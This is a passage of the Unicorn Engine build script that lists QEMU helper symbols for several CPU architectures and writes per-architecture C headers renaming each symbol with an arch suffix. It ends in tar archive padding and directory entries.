helper_paddb \ helper_paddh \ helper_paddw \ helper_psubsb \ helper_psubusb \ helper_psubsh \ helper_psubush \ helper_psubb \ helper_psubh \ helper_psubw \ helper_pshufh \ helper_packsswh \ helper_packsshb \ helper_packushb \ helper_punpcklwd \ helper_punpckhwd \ helper_punpcklhw \ helper_punpckhhw \ helper_punpcklbh \ helper_punpckhbh \ helper_pavgh \ helper_pavgb \ helper_pmaxsh \ helper_pminsh \ helper_pmaxub \ helper_pminub \ helper_pcmpeqw \ helper_pcmpgtw \ helper_pcmpeqh \ helper_pcmpgth \ helper_pcmpeqb \ helper_pcmpgtb \ helper_psllw \ helper_psrlw \ helper_psraw \ helper_psllh \ helper_psrlh \ helper_psrah \ helper_pmullh \ helper_pmulhh \ helper_pmulhuh \ helper_pmaddhw \ helper_pasubub \ helper_biadd \ helper_pmovmskb \ helper_msa_nloc_b \ helper_msa_nloc_h \ helper_msa_nloc_w \ helper_msa_nloc_d \ helper_msa_nlzc_b \ helper_msa_nlzc_h \ helper_msa_nlzc_w \ helper_msa_nlzc_d \ helper_msa_pcnt_b \ helper_msa_pcnt_h \ helper_msa_pcnt_w \ helper_msa_pcnt_d \ helper_msa_binsl_b \ helper_msa_binsl_h \ helper_msa_binsl_w \ helper_msa_binsl_d \ helper_msa_binsr_b \ helper_msa_binsr_h \ helper_msa_binsr_w \ helper_msa_binsr_d \ helper_msa_bmnz_v \ helper_msa_bmz_v \ helper_msa_bsel_v \ helper_msa_bclr_b \ helper_msa_bclr_h \ helper_msa_bclr_w \ helper_msa_bclr_d \ helper_msa_bneg_b \ helper_msa_bneg_h \ helper_msa_bneg_w \ helper_msa_bneg_d \ helper_msa_bset_b \ helper_msa_bset_h \ helper_msa_bset_w \ helper_msa_bset_d \ helper_msa_add_a_b \ helper_msa_add_a_h \ helper_msa_add_a_w \ helper_msa_add_a_d \ helper_msa_adds_a_b \ helper_msa_adds_a_h \ helper_msa_adds_a_w \ helper_msa_adds_a_d \ helper_msa_adds_s_b \ helper_msa_adds_s_h \ helper_msa_adds_s_w \ helper_msa_adds_s_d \ helper_msa_adds_u_b \ helper_msa_adds_u_h \ helper_msa_adds_u_w \ helper_msa_adds_u_d \ helper_msa_addv_b \ helper_msa_addv_h \ helper_msa_addv_w \ helper_msa_addv_d \ helper_msa_hadd_s_h \ helper_msa_hadd_s_w \ helper_msa_hadd_s_d \ helper_msa_hadd_u_h \ helper_msa_hadd_u_w \ helper_msa_hadd_u_d \ helper_msa_ave_s_b \ helper_msa_ave_s_h \ helper_msa_ave_s_w \ helper_msa_ave_s_d \ helper_msa_ave_u_b \ helper_msa_ave_u_h \ helper_msa_ave_u_w \ helper_msa_ave_u_d \ helper_msa_aver_s_b \ helper_msa_aver_s_h \ helper_msa_aver_s_w \ helper_msa_aver_s_d \ helper_msa_aver_u_b \ helper_msa_aver_u_h \ helper_msa_aver_u_w \ helper_msa_aver_u_d \ helper_msa_ceq_b \ helper_msa_ceq_h \ helper_msa_ceq_w \ helper_msa_ceq_d \ helper_msa_cle_s_b \ helper_msa_cle_s_h \ helper_msa_cle_s_w \ helper_msa_cle_s_d \ helper_msa_cle_u_b \ helper_msa_cle_u_h \ helper_msa_cle_u_w \ helper_msa_cle_u_d \ helper_msa_clt_s_b \ helper_msa_clt_s_h \ helper_msa_clt_s_w \ helper_msa_clt_s_d \ helper_msa_clt_u_b \ helper_msa_clt_u_h \ helper_msa_clt_u_w \ helper_msa_clt_u_d \ helper_msa_div_s_b \ helper_msa_div_s_h \ helper_msa_div_s_w \ helper_msa_div_s_d \ helper_msa_div_u_b \ helper_msa_div_u_h \ helper_msa_div_u_w \ helper_msa_div_u_d \ helper_msa_max_a_b \ helper_msa_max_a_h \ helper_msa_max_a_w \ helper_msa_max_a_d \ helper_msa_max_s_b \ helper_msa_max_s_h \ helper_msa_max_s_w \ helper_msa_max_s_d \ helper_msa_max_u_b \ helper_msa_max_u_h \ helper_msa_max_u_w \ helper_msa_max_u_d \ helper_msa_min_a_b \ helper_msa_min_a_h \ helper_msa_min_a_w \ helper_msa_min_a_d \ helper_msa_min_s_b \ helper_msa_min_s_h \ helper_msa_min_s_w \ helper_msa_min_s_d \ helper_msa_min_u_b \ helper_msa_min_u_h \ helper_msa_min_u_w \ helper_msa_min_u_d \ helper_msa_mod_s_b \ helper_msa_mod_s_h \ helper_msa_mod_s_w \ helper_msa_mod_s_d \ helper_msa_mod_u_b \ helper_msa_mod_u_h \ helper_msa_mod_u_w \ helper_msa_mod_u_d \ helper_msa_asub_s_b \ helper_msa_asub_s_h \ helper_msa_asub_s_w \ helper_msa_asub_s_d \ helper_msa_asub_u_b \ helper_msa_asub_u_h \ helper_msa_asub_u_w \ helper_msa_asub_u_d \ helper_msa_hsub_s_h \ helper_msa_hsub_s_w \ helper_msa_hsub_s_d \ helper_msa_hsub_u_h \ helper_msa_hsub_u_w \ helper_msa_hsub_u_d \ helper_msa_ilvev_b \ helper_msa_ilvev_h \ helper_msa_ilvev_w \ helper_msa_ilvev_d \ helper_msa_ilvod_b \ helper_msa_ilvod_h \ helper_msa_ilvod_w \ helper_msa_ilvod_d \ helper_msa_ilvl_b \ helper_msa_ilvl_h \ helper_msa_ilvl_w \ helper_msa_ilvl_d \ helper_msa_ilvr_b \ helper_msa_ilvr_h \ helper_msa_ilvr_w \ helper_msa_ilvr_d \ helper_msa_and_v \ helper_msa_nor_v \ helper_msa_or_v \ helper_msa_xor_v \ helper_msa_move_v \ helper_msa_pckev_b \ helper_msa_pckev_h \ helper_msa_pckev_w \ helper_msa_pckev_d \ helper_msa_pckod_b \ helper_msa_pckod_h \ helper_msa_pckod_w \ helper_msa_pckod_d \ helper_msa_sll_b \ helper_msa_sll_h \ helper_msa_sll_w \ helper_msa_sll_d \ helper_msa_sra_b \ helper_msa_sra_h \ helper_msa_sra_w \ helper_msa_sra_d \ helper_msa_srar_b \ helper_msa_srar_h \ helper_msa_srar_w \ helper_msa_srar_d \ helper_msa_srl_b \ helper_msa_srl_h \ helper_msa_srl_w \ helper_msa_srl_d \ helper_msa_srlr_b \ helper_msa_srlr_h \ helper_msa_srlr_w \ helper_msa_srlr_d \ helper_msa_andi_b \ helper_msa_ori_b \ helper_msa_nori_b \ helper_msa_xori_b \ helper_msa_bmnzi_b \ helper_msa_bmzi_b \ helper_msa_bseli_b \ helper_msa_shf_df \ helper_msa_addvi_df \ helper_msa_subvi_df \ helper_msa_ceqi_df \ helper_msa_clei_s_df \ helper_msa_clei_u_df \ helper_msa_clti_s_df \ helper_msa_clti_u_df \ helper_msa_maxi_s_df \ helper_msa_maxi_u_df \ helper_msa_mini_s_df \ helper_msa_mini_u_df \ helper_msa_ldi_df \ helper_msa_slli_df \ helper_msa_srai_df \ helper_msa_srli_df \ helper_msa_bclri_df \ helper_msa_bseti_df \ helper_msa_bnegi_df \ helper_msa_sat_s_df \ helper_msa_sat_u_df \ helper_msa_srari_df \ helper_msa_srlri_df \ helper_msa_binsli_df \ helper_msa_binsri_df \ helper_msa_subv_df \ helper_msa_subs_s_df \ helper_msa_subs_u_df \ helper_msa_subsus_u_df \ helper_msa_subsuu_s_df \ helper_msa_mulv_df \ helper_msa_dotp_s_df \ helper_msa_dotp_u_df \ helper_msa_mul_q_df \ helper_msa_mulr_q_df \ helper_msa_sld_df \ helper_msa_maddv_df \ helper_msa_msubv_df \ helper_msa_dpadd_s_df \ helper_msa_dpadd_u_df \ helper_msa_dpsub_s_df \ helper_msa_dpsub_u_df \ helper_msa_binsl_df \ helper_msa_binsr_df \ helper_msa_madd_q_df \ helper_msa_msub_q_df \ helper_msa_maddr_q_df \ helper_msa_msubr_q_df \ helper_msa_splat_df \ helper_msa_vshf_df \ helper_msa_sldi_df \ helper_msa_splati_df \ helper_msa_copy_s_b \ helper_msa_copy_s_h \ helper_msa_copy_s_w \ helper_msa_copy_s_d \ helper_msa_copy_u_b \ helper_msa_copy_u_h \ helper_msa_copy_u_w \ helper_msa_insert_b \ helper_msa_insert_h \ helper_msa_insert_w \ helper_msa_insert_d \ helper_msa_insve_df \ helper_msa_ctcmsa \ helper_msa_cfcmsa \ helper_msa_fill_df \ helper_msa_fcaf_df \ helper_msa_fcun_df \ helper_msa_fceq_df \ helper_msa_fcueq_df \ helper_msa_fclt_df \ helper_msa_fcult_df \ helper_msa_fcle_df \ helper_msa_fcule_df \ helper_msa_fsaf_df \ helper_msa_fsun_df \ helper_msa_fseq_df \ helper_msa_fsueq_df \ helper_msa_fslt_df \ helper_msa_fsult_df \ helper_msa_fsle_df \ helper_msa_fsule_df \ helper_msa_fcor_df \ helper_msa_fcune_df \ helper_msa_fcne_df \ helper_msa_fsor_df \ helper_msa_fsune_df \ helper_msa_fsne_df \ helper_msa_fadd_df \ helper_msa_fsub_df \ helper_msa_fmul_df \ helper_msa_fdiv_df \ helper_msa_fmadd_df \ helper_msa_fmsub_df \ helper_msa_fexp2_df \ helper_msa_fexdo_df \ helper_msa_ftq_df \ helper_msa_fmin_df \ helper_msa_fmin_a_df \ helper_msa_fmax_df \ helper_msa_fmax_a_df \ helper_msa_fclass_df \ helper_msa_ftrunc_s_df \ helper_msa_ftrunc_u_df \ helper_msa_fsqrt_df \ helper_msa_frsqrt_df \ helper_msa_frcp_df \ helper_msa_frint_df \ helper_msa_flog2_df \ helper_msa_fexupl_df \ helper_msa_fexupr_df \ helper_msa_ffql_df \ helper_msa_ffqr_df \ helper_msa_ftint_s_df \ helper_msa_ftint_u_df \ helper_msa_ffint_s_df \ helper_msa_ffint_u_df \ helper_raise_exception_err \ helper_raise_exception \ helper_raise_exception_debug \ helper_muls \ helper_mulsu \ helper_macc \ helper_macchi \ helper_maccu \ helper_macchiu \ helper_msac \ helper_msachi \ helper_msacu \ helper_msachiu \ helper_mulhi \ helper_mulhiu \ helper_mulshi \ helper_mulshiu \ helper_dbitswap \ helper_bitswap \ helper_rotx \ helper_ll \ helper_lld \ helper_swl \ helper_swr \ helper_sdl \ helper_sdr \ helper_lwm \ helper_swm \ helper_ldm \ helper_sdm \ helper_fork \ helper_yield \ r4k_helper_tlbinv \ r4k_helper_tlbinvf \ r4k_helper_tlbwi \ r4k_helper_tlbwr \ r4k_helper_tlbp \ r4k_helper_tlbr \ helper_tlbwi \ helper_tlbwr \ helper_tlbp \ helper_tlbr \ helper_tlbinv \ helper_tlbinvf \ helper_ginvt \ helper_di \ helper_ei \ helper_eret \ helper_eretnc \ helper_deret \ helper_rdhwr_cpunum \ helper_rdhwr_synci_step \ helper_rdhwr_cc \ helper_rdhwr_ccres \ helper_rdhwr_performance \ helper_rdhwr_xnp \ helper_pmon \ helper_wait \ mips_cpu_do_unaligned_access \ mips_cpu_do_transaction_failed \ helper_msa_ld_b \ helper_msa_ld_h \ helper_msa_ld_w \ helper_msa_ld_d \ helper_msa_st_b \ helper_msa_st_h \ helper_msa_st_w \ helper_msa_st_d \ helper_cache \ gen_intermediate_code \ mips_tcg_init \ cpu_mips_realize_env \ cpu_state_reset \ restore_state_to_opc \ ieee_rm \ mips_defs \ mips_defs_number \ gen_helper_float_class_s \ gen_helper_float_class_d \ " mipsel_SYMBOLS=${mips_SYMBOLS} mips64_SYMBOLS=${mips_SYMBOLS} mips64el_SYMBOLS=${mips_SYMBOLS} sparc_SYMBOLS=" helper_compute_psr \ helper_compute_C_icc \ cpu_sparc_set_id \ cpu_sparc_init \ helper_check_ieee_exceptions \ helper_fadds \ helper_faddd \ helper_faddq \ helper_fsubs \ helper_fsubd \ helper_fsubq \ helper_fmuls \ helper_fmuld \ helper_fmulq \ helper_fdivs \ helper_fdivd \ helper_fdivq \ helper_fsmuld \ helper_fsmulq \ helper_fdmulq \ helper_fnegs \ helper_fnegd \ helper_fnegq \ helper_fitos \ helper_fitod \ helper_fitoq \ helper_fxtos \ helper_fxtod \ helper_fxtoq \ helper_fdtos \ helper_fstod \ helper_fqtos \ helper_fstoq \ helper_fqtod \ helper_fdtoq \ helper_fstoi \ helper_fdtoi \ helper_fqtoi \ helper_fstox \ helper_fdtox \ helper_fqtox \ helper_fabss \ helper_fabsd \ helper_fabsq \ helper_fsqrts \ helper_fsqrtd \ helper_fsqrtq \ helper_fcmps \ helper_fcmpd \ helper_fcmpes \ helper_fcmped \ helper_fcmpq \ helper_fcmpeq \ helper_fcmps_fcc1 \ helper_fcmpd_fcc1 \ helper_fcmpq_fcc1 \ helper_fcmps_fcc2 \ helper_fcmpd_fcc2 \ helper_fcmpq_fcc2 \ helper_fcmps_fcc3 \ helper_fcmpd_fcc3 \ helper_fcmpq_fcc3 \ helper_fcmpes_fcc1 \ helper_fcmped_fcc1 \ helper_fcmpeq_fcc1 \ helper_fcmpes_fcc2 \ helper_fcmped_fcc2 \ helper_fcmpeq_fcc2 \ helper_fcmpes_fcc3 \ helper_fcmped_fcc3 \ helper_fcmpeq_fcc3 \ helper_ldfsr \ helper_ldxfsr \ cpu_raise_exception_ra \ helper_raise_exception \ helper_debug \ helper_tick_set_count \ helper_tick_get_count \ helper_tick_set_limit \ helper_udiv \ helper_udiv_cc \ helper_sdiv \ helper_sdiv_cc \ helper_sdivx \ helper_udivx \ helper_taddcctv \ helper_tsubcctv \ helper_power_down \ sparc_cpu_do_interrupt \ leon3_irq_manager \ sparc_cpu_do_interrupt \ cpu_tsptr \ helper_set_softint \ helper_clear_softint \ helper_write_softint \ helper_check_align \ helper_ld_asi \ helper_st_asi \ sparc_cpu_do_transaction_failed \ sparc_cpu_do_unaligned_access \ sparc_cpu_tlb_fill \ mmu_probe \ sparc_cpu_memory_rw_debug \ cpu_get_phys_page_nofault \ sparc_cpu_get_phys_page_debug \ gen_intermediate_code \ sparc_tcg_init \ restore_state_to_opc \ cpu_set_cwp \ cpu_get_psr \ cpu_put_psr_raw \ cpu_put_psr \ cpu_cwp_inc \ cpu_cwp_dec \ helper_rett \ helper_save \ helper_restore \ helper_flushw \ helper_saved \ helper_restored \ helper_wrpsr \ helper_rdpsr \ cpu_get_ccr \ cpu_put_ccr \ cpu_get_cwp64 \ cpu_put_cwp64 \ helper_rdccr \ helper_wrccr \ helper_rdcwp \ helper_wrcwp \ cpu_gl_switch_gregs \ helper_wrgl \ cpu_change_pstate \ helper_wrpstate \ helper_wrpil \ helper_done \ helper_retry \ " sparc64_SYMBOLS=${sparc_SYMBOLS} m68k_SYMBOLS=" cpu_m68k_init \ helper_reds32 \ helper_redf32 \ helper_exts32 \ helper_extf32 \ helper_extf64 \ helper_redf64 \ helper_firound \ cpu_m68k_set_fpcr \ helper_fitrunc \ helper_set_fpcr \ helper_fsround \ helper_fdround \ helper_fsqrt \ helper_fssqrt \ helper_fdsqrt \ helper_fabs \ helper_fsabs \ helper_fdabs \ helper_fneg \ helper_fsneg \ helper_fdneg \ helper_fadd \ helper_fsadd \ helper_fdadd \ helper_fsub \ helper_fssub \ helper_fdsub \ helper_fmul \ helper_fsmul \ helper_fdmul \ helper_fsglmul \ helper_fdiv \ helper_fsdiv \ helper_fddiv \ helper_fsgldiv \ helper_fcmp \ helper_ftst \ helper_fconst \ helper_fmovemx_st_predec \ helper_fmovemx_st_postinc \ helper_fmovemx_ld_postinc \ helper_fmovemd_st_predec \ helper_fmovemd_st_postinc \ helper_fmovemd_ld_postinc \ helper_fmod \ helper_frem \ helper_fgetexp \ helper_fgetman \ helper_fscale \ helper_flognp1 \ helper_flogn \ helper_flog10 \ helper_flog2 \ helper_fetox \ helper_ftwotox \ helper_ftentox \ helper_ftan \ helper_fsin \ helper_fcos \ helper_fsincos \ helper_fatan \ helper_fasin \ helper_facos \ helper_fatanh \ helper_ftanh \ helper_fsinh \ helper_fcosh \ helper_cf_movec_to \ helper_m68k_movec_to \ helper_m68k_movec_from \ helper_set_macsr \ m68k_switch_sp \ m68k_cpu_get_phys_page_debug \ m68k_set_irq_level \ m68k_cpu_tlb_fill \ helper_bitrev \ helper_ff1 \ helper_sats \ cpu_m68k_set_sr \ helper_set_sr \ helper_mac_move \ helper_macmuls \ helper_macmulu \ helper_macmulf \ helper_macsats \ helper_macsatu \ helper_macsatf \ helper_mac_set_flags \ cpu_m68k_get_ccr \ helper_get_ccr \ cpu_m68k_set_ccr \ helper_set_ccr \ helper_flush_flags \ helper_get_macf \ helper_get_macs \ helper_get_macu \ helper_get_mac_extf \ helper_get_mac_exti \ helper_set_mac_extf \ helper_set_mac_exts \ helper_set_mac_extu \ helper_ptest \ helper_pflush \ helper_reset \ m68k_cpu_do_interrupt \ m68k_cpu_transaction_failed \ m68k_cpu_exec_interrupt \ helper_raise_exception \ helper_divuw \ helper_divsw \ helper_divul \ helper_divsl \ helper_divull \ helper_divsll \ helper_cas2w \ helper_cas2l \ helper_cas2l_parallel \ helper_bfexts_mem \ helper_bfextu_mem \ helper_bfins_mem \ helper_bfchg_mem \ helper_bfclr_mem \ helper_bfset_mem \ helper_bfffo_reg \ helper_bfffo_mem \ helper_chk \ helper_chk2 \ floatx80_mod \ floatx80_getman \ floatx80_getexp \ floatx80_scale \ floatx80_move \ floatx80_lognp1 \ floatx80_logn \ floatx80_log10 \ floatx80_log2 \ floatx80_etox \ floatx80_twotox \ floatx80_tentox \ floatx80_tan \ floatx80_sin \ floatx80_cos \ floatx80_atan \ floatx80_asin \ floatx80_acos \ floatx80_atanh \ floatx80_etoxm1 \ floatx80_tanh \ floatx80_sinh \ floatx80_cosh \ m68k_tcg_init \ register_m68k_insns \ gen_intermediate_code \ restore_state_to_opc \ " ppc_SYMBOLS=" ppc_cpu_unrealize \ ppc_cpu_instance_finalize \ ppc_cpu_do_interrupt \ ppc_cpu_do_system_reset \ ppc_cpu_do_fwnmi_machine_check \ ppc_cpu_exec_interrupt \ raise_exception_err_ra \ raise_exception_err \ raise_exception \ raise_exception_ra \ helper_raise_exception_err \ helper_store_msr \ helper_rfi \ helper_40x_rfci \ helper_rfdi \ helper_rfci \ helper_rfmci \ helper_tw \ helper_rfsvc \ helper_msgclr \ helper_msgsnd \ helper_book3s_msgclr \ ppc_cpu_do_unaligned_access \ helper_divweu \ helper_divwe \ helper_sraw \ helper_popcntb \ helper_div \ helper_divo \ helper_divs \ helper_divso \ helper_602_mfrom \ helper_mtvscr \ helper_vaddcuw \ helper_vprtybw \ helper_vprtybd \ helper_vprtybq \ helper_vmuluwm \ helper_vaddfp \ helper_vsubfp \ helper_vminfp \ helper_vmaxfp \ helper_vmaddfp \ helper_vnmsubfp \ helper_vaddsbs \ helper_vsubsbs \ helper_vsubshs \ helper_vaddsws \ helper_vsubsws \ helper_vaddubs \ helper_vsububs \ helper_vadduhs \ helper_vsubuhs \ helper_vadduws \ helper_vsubuws \ helper_vavgsb \ helper_vavgub \ helper_vavgsh \ helper_vavguh \ helper_vavgsw \ helper_vabsdub \ helper_vabsduh \ helper_vabsduw \ helper_vcfux \ helper_vcfsx \ helper_vcmpequb \ helper_vcmpequb_dot \ helper_vcmpequw \ helper_vcmpequw_dot \ helper_vcmpequd \ helper_vcmpequd_dot \ helper_vcmpgtub \ helper_vcmpgtub_dot \ helper_vcmpgtuh \ helper_vcmpgtuh_dot \ helper_vcmpgtuw \ helper_vcmpgtuw_dot \ helper_vcmpgtud \ helper_vcmpgtud_dot \ helper_vcmpgtud \ helper_vcmpgtud_dot \ helper_vcmpgtsb \ helper_vcmpgtsb_dot \ helper_vcmpgtsh \ helper_vcmpgtsh_dot \ helper_vcmpgtsw \ helper_vcmpgtsw_dot \ helper_vcmpgtsd \ helper_vcmpgtsd_dot \ helper_vcmpnezb \ helper_vcmpnezb_dot \ helper_vcmpnezb \ helper_vcmpnezb_dot \ helper_vcmpnezw \ helper_vcmpnezw_dot \ helper_vcmpneb \ helper_vcmpneb_dot \ helper_vcmpneb \ helper_vcmpneb_dot \ helper_vcmpneh \ helper_vcmpneh_dot \ helper_vcmpnew \ helper_vcmpnew_dot \ helper_vcmpeqfp \ helper_vcmpeqfp_dot \ helper_vcmpgefp \ helper_vcmpgefp_dot \ helper_vcmpgtfp \ helper_vcmpgtfp_dot \ helper_vcmpbfp \ helper_vcmpbfp_dot \ helper_vcmpbfp \ helper_vcmpbfp_dot \ helper_vctuxs \ helper_vctsxs \ helper_vclzlsbb \ helper_vctzlsbb \ helper_vmhaddshs \ helper_vmhraddshs \ helper_vmladduhm \ helper_vmhraddshs \ helper_vmladduhm \ helper_vmrglb \ helper_vmrghb \ helper_vmrglh \ helper_vmrghh \ helper_vmrglw \ helper_vmrghw \ helper_vmsummbm \ helper_vmsumshs \ helper_vmsumubm \ helper_vmsumuhm \ helper_vmulesb \ helper_vmulosb \ helper_vmulesh \ helper_vmulesw \ helper_vmuleub \ helper_vmuloub \ helper_vmuleuh \ helper_vmulouh \ helper_vmuleuw \ helper_vmulouw \ helper_vperm \ helper_vpermr \ helper_vbpermd \ helper_vpmsumb \ helper_vpmsumh \ helper_vpmsumw \ helper_vpmsumd \ helper_vpkpx \ helper_vpkshss \ helper_vpkshus \ helper_vpkswss \ helper_vpkswus \ helper_vpksdss \ helper_vpksdus \ helper_vpkuhus \ helper_vpkuwus \ helper_vpkudus \ helper_vpkuhum \ helper_vpkuwum \ helper_vpkudum \ helper_vrefp \ helper_vrfin \ helper_vrfim \ helper_vrfip \ helper_vrfiz \ helper_vrlb \ helper_vrlh \ helper_vrlw \ helper_vrld \ helper_vrsqrtefp \ helper_vrldmi \ helper_vrlwmi \ helper_vrldnm \ helper_vrlwnm \ helper_vsel \ helper_vexptefp \ helper_vlogefp \ helper_vextublx \ helper_vextuhlx \ helper_vextuwlx \ helper_vextubrx \ helper_vextuhrx \ helper_vextuwrx \ helper_vslv \ helper_vsrv \ helper_vsldoi \ helper_vslo \ helper_vinsertb \ helper_vinserth \ helper_vinsertw \ helper_vinsertd \ helper_vextractub \ helper_vextractuh \ helper_vextractuw \ helper_vextractd \ helper_xxextractuw \ helper_xxinsertw \ helper_vextsb2w \ helper_vextsb2d \ helper_vextsh2w \ helper_vextsh2d \ helper_vnegw \ helper_vnegd \ helper_vsro \ helper_vsubcuw \ helper_vsumsws \ helper_vsum2sws \ helper_vsum4sbs \ helper_vsum4shs \ helper_vsum4ubs \ helper_vupklpx \ helper_vupkhpx \ helper_vupkhsb \ helper_vupkhsh \ helper_vupkhsw \ helper_vupklsb \ helper_vupklsh \ helper_vupklsw \ helper_vclzb \ helper_vclzh \ helper_vctzb \ helper_vctzh \ helper_vctzw \ helper_vctzd \ helper_vpopcntb \ helper_vpopcnth \ helper_vpopcntw \ helper_vpopcntd \ helper_vadduqm \ helper_vaddeuqm \ helper_vaddcuq \ helper_vaddecuq \ helper_vsubuqm \ helper_vsubeuqm \ helper_vsubcuq \ helper_vsubecuq \ helper_bcdadd \ helper_bcdsub \ helper_bcdcfn \ helper_bcdctn \ helper_bcdcfz \ helper_bcdctz \ helper_bcdcfsq \ helper_bcdctsq \ helper_bcdcpsgn \ helper_bcdsetsgn \ helper_bcds \ helper_bcdus \ helper_bcdsr \ helper_bcdtrunc \ helper_bcdutrunc \ helper_vsbox \ helper_vcipher \ helper_vcipherlast \ helper_vncipher \ helper_vncipherlast \ helper_vshasigmaw \ helper_vshasigmad \ helper_vpermxor \ helper_brinc \ helper_cntlsw32 \ helper_cntlzw32 \ helper_dlmzb \ helper_lmw \ helper_lsw \ helper_lswx \ helper_stsw \ helper_dcbz \ helper_dcbzep \ helper_icbi \ helper_icbiep \ helper_lscbx \ helper_lvebx \ helper_lvehx \ helper_lvewx \ helper_stvebx \ helper_stvehx \ helper_stvewx \ helper_tbegin \ helper_load_dump_spr \ helper_store_dump_spr \ helper_hfscr_facility_check \ helper_fscr_facility_check \ helper_msr_facility_check \ helper_store_sdr1 \ helper_store_pidr \ helper_store_lpidr \ helper_store_hid0_601 \ helper_store_403_pbr \ helper_store_40x_dbcr0 \ helper_store_40x_sler \ helper_clcs \ ppc_store_msr \ helper_fixup_thrm \ store_40x_sler \ dump_mmu \ ppc_cpu_get_phys_page_debug \ helper_store_ibatu \ helper_store_ibatl \ helper_store_dbatu \ helper_store_dbatl \ helper_store_601_batu \ helper_store_601_batl \ ppc_tlb_invalidate_all \ ppc_tlb_invalidate_one \ ppc_store_sdr1 \ helper_load_sr \ helper_store_sr \ helper_tlbia \ helper_tlbie \ helper_tlbiva \ helper_6xx_tlbd \ helper_6xx_tlbi \ helper_74xx_tlbd \ helper_74xx_tlbi \ helper_rac \ helper_4xx_tlbre_hi \ helper_4xx_tlbre_lo \ helper_4xx_tlbwe_hi \ helper_4xx_tlbwe_lo \ helper_4xx_tlbsx \ helper_440_tlbwe \ helper_440_tlbre \ helper_440_tlbsx \ helper_booke_setpid \ helper_booke_set_eplc \ helper_booke_set_epsc \ helper_booke206_tlbwe \ helper_booke206_tlbre \ helper_booke206_tlbsx \ helper_booke206_tlbivax \ helper_booke206_tlbilx0 \ helper_booke206_tlbilx1 \ helper_booke206_tlbilx3 \ helper_booke206_tlbflush \ helper_check_tlb_flush_local \ helper_check_tlb_flush_global \ ppc_cpu_tlb_fill \ helper_load_tbl \ helper_load_tbu \ helper_load_atbl \ helper_load_atbu \ helper_load_vtb \ helper_load_601_rtcl \ helper_load_601_rtcu \ helper_store_tbl \ helper_store_tbu \ helper_store_atbl \ helper_store_atbu \ helper_store_601_rtcl \ helper_store_601_rtcu \ helper_load_decr \ helper_store_decr \ helper_load_hdecr \ helper_store_hdecr \ helper_store_vtb \ helper_store_tbu40 \ helper_load_40x_pit \ helper_store_40x_pit \ helper_store_booke_tcr \ helper_store_booke_tsr \ helper_load_dcr \ helper_store_dcr \ helper_raise_exception \ helper_book3s_msgsnd \ helper_cmpb \ helper_mfvscr \ helper_vaddshs \ helper_vavguw \ helper_vcmpequh \ helper_vcmpequh_dot \ helper_vcmpnezh \ helper_vcmpnezh_dot \ helper_vmsumshm \ helper_vmsumuhs \ helper_vmulosh \ helper_vmulosw \ helper_vbpermq \ helper_vextsw2d \ helper_stmw \ ppc_translate_init \ cpu_ppc_init \ gen_intermediate_code \ restore_state_to_opc \ ppc_set_irq \ ppc6xx_irq_init \ ppc40x_core_reset \ ppc40x_chip_reset \ ppc40x_system_reset \ store_40x_dbcr0 \ ppc40x_irq_init \ ppce500_irq_init \ ppce500_set_mpic_proxy \ cpu_ppc_get_tb \ cpu_ppc_load_tbl \ cpu_ppc_load_tbu \ cpu_ppc_store_tbl \ cpu_ppc_store_tbu \ cpu_ppc_load_atbl \ cpu_ppc_load_atbu \ cpu_ppc_store_atbl \ cpu_ppc_store_atbu \ cpu_ppc_load_vtb \ cpu_ppc_store_vtb \ cpu_ppc_store_tbu40 \ ppc_decr_clear_on_delivery \ cpu_ppc_load_decr \ cpu_ppc_load_hdecr \ cpu_ppc_load_purr \ cpu_ppc_store_decr \ cpu_ppc_store_hdecr \ cpu_ppc_store_purr \ cpu_ppc_tb_init \ cpu_ppc601_load_rtcu \ cpu_ppc601_store_rtcu \ cpu_ppc601_load_rtcl \ cpu_ppc601_store_rtcl \ load_40x_pit \ store_40x_pit \ ppc_40x_timers_init \ ppc_dcr_read \ ppc_dcr_write \ ppc_dcr_register \ ppc_dcr_init \ ppc_cpu_pir \ ppc_irq_reset \ store_booke_tsr \ get_pteg_offset32 \ ppc_booke_timers_init \ ppc_hash32_handle_mmu_fault \ gen_helper_store_booke_tsr \ gen_helper_store_booke_tcr \ store_booke_tcr \ ppc_hash32_get_phys_page_debug \ " ppc64_SYMBOLS=${ppc_SYMBOLS} s390x_SYMBOLS="helper_uc_s390x_exit \ tcg_s390_tod_updated \ tcg_s390_program_interrupt \ tcg_s390_data_exception \ " tricore_SYMBOLS=" helper_fadd \ helper_fsub \ helper_fmul \ helper_fdiv \ helper_fmadd \ helper_fmsub \ helper_pack \ gen_intermediate_code \ restore_state_to_opc \ helper_uc_tricore_exit \ " ARCHS="x86_64 arm aarch64 riscv32 riscv64 mips mipsel mips64 mips64el sparc sparc64 m68k ppc ppc64 s390x tricore" for arch in $ARCHS; do echo "Generating header for $arch" echo "/* Autogen header for Unicorn Engine - DONOT MODIFY */" > $SOURCE_DIR/qemu/$arch.h echo "#ifndef UNICORN_AUTOGEN_${arch}_H" >> $SOURCE_DIR/qemu/$arch.h echo "#define UNICORN_AUTOGEN_${arch}_H" >> $SOURCE_DIR/qemu/$arch.h echo "#ifndef UNICORN_ARCH_POSTFIX" >> $SOURCE_DIR/qemu/$arch.h echo "#define UNICORN_ARCH_POSTFIX _$arch" >> $SOURCE_DIR/qemu/$arch.h echo "#endif" >> $SOURCE_DIR/qemu/$arch.h for loop in $COMMON_SYMBOLS; do echo "#define $loop ${loop}_${arch}" >> $SOURCE_DIR/qemu/$arch.h done ARCH_SYMBOLS=$(eval echo '$'"${arch}_SYMBOLS") #echo ${ARCH_SYMBOLS} for loop in $ARCH_SYMBOLS; do echo "#define $loop ${loop}_${arch}" >> $SOURCE_DIR/qemu/$arch.h done echo "#endif" >> $SOURCE_DIR/qemu/$arch.h done �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/��������������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0014346�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/benchmarks/���������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016463�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/benchmarks/cow/�����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017253�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�����������������������������������������������������������������������������������������������������������������������������������������